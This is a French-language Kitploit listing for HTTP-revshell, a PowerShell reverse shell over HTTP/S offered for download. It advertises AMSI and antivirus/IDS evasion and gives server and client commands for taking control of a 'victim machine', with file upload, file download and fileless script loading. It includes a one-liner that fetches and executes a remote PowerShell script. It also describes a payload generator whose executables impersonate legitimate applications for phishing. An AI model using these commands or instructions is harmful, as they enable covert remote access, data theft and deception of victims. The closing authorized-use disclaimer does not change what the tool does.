Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
HTTP-revshell — Reverse shell PowerShell utilisant le protocole HTTP/S avec contournement AMSI et compatible proxy | Kitploit
Outils/GitHubGitHub/3v4si0n/http-revshell
Outils de PhishingGénération de PayloadsÉvasion IDS/IPSPost-ExploitationCommandement et ContrôleRed TeamingOutil d'Accès à Distance
GitHub3v4si0n/http-revshell

HTTP-revshell

Reverse shell PowerShell utilisant le protocole HTTP/S avec contournement AMSI et compatible proxy

Voir le dépôt
5989012il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Powershell HTTP/S Reverse Shell

Category-tool Powershell Python License

HTTP-revshell est un outil axé sur les exercices d'équipe rouge (redteam) et les testeurs de pénétration. Cet outil fournit une connexion inverse via le protocole http/s. Il utilise un canal caché pour prendre le contrôle de la machine victime via des requêtes web, contournant ainsi des solutions telles que l'IDS, l'IPS et l'AV.

NOTE : L'outil ne sera pas maintenu en termes de contournement. Avec seulement quelques modifications, vous pouvez contourner de nombreux EDR du marché.

HTTP-revshell

Aide de server.py

Utilisation du serveur :

root@kitploit:~
usage: server.py [-h] [--ssl] [--autocomplete] host port

positional arguments:
  host            Listen Host
  port            Listen Port

optional arguments:
  -h, --help      show this help message and exit
  --ssl           Send traffic over ssl
  --autocomplete  Autocomplete powershell functions

Aide d'Invoke-WebRev.ps1 (client)

Utilisation du client :

root@kitploit:~
Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]

Installation

root@kitploit:~
git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt

Fonctionnalités

  • SSL
  • Proxy Aware
  • Téléversement de fichiers
  • Téléchargement de fichiers
  • Charger des scripts PowerShell via le serveur
  • Contrôle des erreurs
  • Contournement AMSI
  • Auto-complétion des fonctions PowerShell (optionnelle)

Utilisation des fonctions supplémentaires

Upload

Cette fonction vous permet de téléverser n'importe quel fichier vers la machine victime.

Utilisation :

root@kitploit:~
upload /src/path/file C:\dest\path\file

Download

Cette fonction vous permet de télécharger un fichier vers la machine de l'attaquant.

Utilisation :

root@kitploit:~
download C:\src\path\file /dst/path/file

Loadps1

Cette fonction vous permet de charger des scripts PowerShell sans avoir à écrire sur le disque de la victime, en lisant le fichier via un trafic HTTP légitime.

Utilisation :

root@kitploit:~
loadps1 /path/to/the/local/server/PowershellScript.ps1

Aide de Revshell-Generator.ps1 (Générateur automatique de payload)

Ce script vous permet de créer un fichier exécutable avec le payload nécessaire pour utiliser HTTP-revshell, il vous suffit de suivre les instructions à l'écran pour le générer. Il existe 6 modèles prédéfinis et un personnalisable, avec les données que vous souhaitez.

Les payloads générés par l'outil intègrent l'icône légitime de l'application, ainsi que les informations sur le produit et le copyright de l'application d'origine. De plus, chacun d'eux ouvre l'application d'origine avant d'établir la connexion avec le serveur, se faisant passer pour une application légitime. Cela peut être utilisé pour du phishing ou des exercices Red Team.

Utilisation du générateur de payload :

root@kitploit:~
powershell "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"

Revshell-Generator

IMPORTANT : Tous les champs des modèles prédéfinis sont automatiquement complétés en appuyant sur la touche Entrée.

Crédits

  • JoelGMSec pour son génial Revshell-Generator.ps1. Twitter : @JoelGMSec
  • dev-2null pour avoir signalé le premier bug. Twitter : @dev2null

Avertissement et licence

Ce script est sous licence LGPLv3+. Lien direct vers la Licence.

HTTP-revshell doit être utilisé uniquement pour des tests de pénétration autorisés et/ou à des fins éducatives non lucratives. Toute utilisation abusive de ce logiciel n'engagera pas la responsabilité de l'auteur ou de tout autre collaborateur. Utilisez-le sur vos propres serveurs et/ou avec l'autorisation du propriétaire du serveur.

Télécharger l’outil